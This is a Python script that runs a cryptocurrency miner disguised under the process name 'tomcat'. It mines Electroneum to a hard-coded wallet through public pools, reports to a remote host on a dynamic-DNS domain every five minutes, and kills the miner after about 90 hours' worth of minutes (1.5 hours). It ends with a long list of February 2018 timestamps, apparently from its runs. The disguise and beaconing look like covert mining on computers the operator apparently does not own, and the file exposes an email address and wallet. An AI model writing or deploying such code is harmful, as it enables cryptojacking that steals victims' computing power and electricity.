import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:33:01.317084
#2018-02-17 16:19:04.861482
#2018-02-17 18:06:07.441029
#2018-02-17 19:53:04.869506
#2018-02-17 21:42:05.591197
#2018-02-17 23:26:04.781899
#2018-02-18 01:16:05.107685
#2018-02-18 03:03:07.242898
#2018-02-18 04:52:07.211653
#2018-02-18 06:42:05.921157
#2018-02-18 08:31:01.452026
#2018-02-18 10:18:05.727999
#2018-02-18 12:04:05.762696
#2018-02-18 13:49:06.538304
#2018-02-18 15:41:01.867110
#2018-02-18 17:31:06.146574
#2018-02-18 19:18:03.351710
#2018-02-18 21:04:07.305258
#2018-02-18 22:52:07.242266
#2018-02-19 00:40:04.489487
#2018-02-19 02:26:03.982791
#2018-02-19 04:13:06.351545
#2018-02-19 05:57:07.402976
#2018-02-19 07:45:09.783023
#2018-02-19 09:36:02.049579
#2018-02-19 11:25:06.716104
#2018-02-19 13:12:07.716043
#2018-02-19 15:02:02.147987
#2018-02-19 16:51:01.283675
#2018-02-19 18:37:01.402914
#2018-02-19 20:24:06.424883
#2018-02-19 22:13:04.342722
#2018-02-19 23:59:05.277524
#2018-02-20 01:46:01.768549
#2018-02-20 03:34:06.741165
#2018-02-20 05:21:04.473800
#2018-02-20 07:05:06.676484
#2018-02-20 08:51:01.864608
#2018-02-20 10:34:07.793539
#2018-02-20 12:19:01.850331
#2018-02-20 14:06:07.317519
#2018-02-20 15:50:10.410401
#2018-02-20 17:35:10.851676
#2018-02-20 19:22:08.809374
#2018-02-20 21:13:01.433840
#2018-02-20 22:59:06.441482
#2018-02-21 00:42:04.712611
#2018-02-21 02:28:07.985517
#2018-02-21 04:14:06.579628
#2018-02-21 06:02:09.442172
#2018-02-21 07:50:04.009541
#2018-02-21 09:34:05.267111
#2018-02-21 11:23:04.343078
#2018-02-21 13:13:07.054896
#2018-02-21 14:58:01.942530
#2018-02-21 16:46:09.089176
#2018-02-21 18:37:01.638775
#2018-02-21 20:22:08.548148
#2018-02-21 22:10:06.174462
#2018-02-21 23:57:04.467250
#2018-02-22 01:44:02.266793
#2018-02-22 03:32:05.599930
#2018-02-22 05:18:06.349380
#2018-02-22 07:03:06.798461
#2018-02-22 08:49:03.983577
#2018-02-22 10:37:05.580069
#2018-02-22 12:24:04.069048
#2018-02-22 14:10:11.139236
#2018-02-22 15:57:08.213617
#2018-02-22 17:45:03.656481
#2018-02-22 19:32:07.521119
#2018-02-22 21:26:01.673024
#2018-02-22 23:13:06.966684
#2018-02-23 00:59:04.279893
#2018-02-23 02:48:05.917362
#2018-02-23 04:36:01.658709
#2018-02-23 06:22:03.604777
#2018-02-23 08:09:06.274162
#2018-02-23 10:22:07.641438
#2018-02-23 12:14:04.150313
#2018-02-23 14:02:06.559201
#2018-02-23 15:53:01.731189
#2018-02-23 17:38:07.792594
#2018-02-23 19:25:05.773384
#2018-02-23 21:08:01.451593
#2018-02-23 22:54:08.063617
#2018-02-24 00:42:05.886309
#2018-02-24 02:33:04.435652
#2018-02-24 04:27:05.687498
#2018-02-24 06:13:03.768979
#2018-02-24 08:01:04.069683
#2018-02-24 09:46:01.394272
#2018-02-24 11:41:01.434437
#2018-02-24 13:32:06.448689
#2018-02-24 15:19:05.131310
#2018-02-24 17:09:06.199494
#2018-02-24 19:01:06.345479
#2018-02-24 20:48:05.578589
#2018-02-24 23:05:03.985860
#2018-02-25 02:21:05.635347
#2018-02-25 05:38:05.512464
#2018-02-25 11:35:04.272349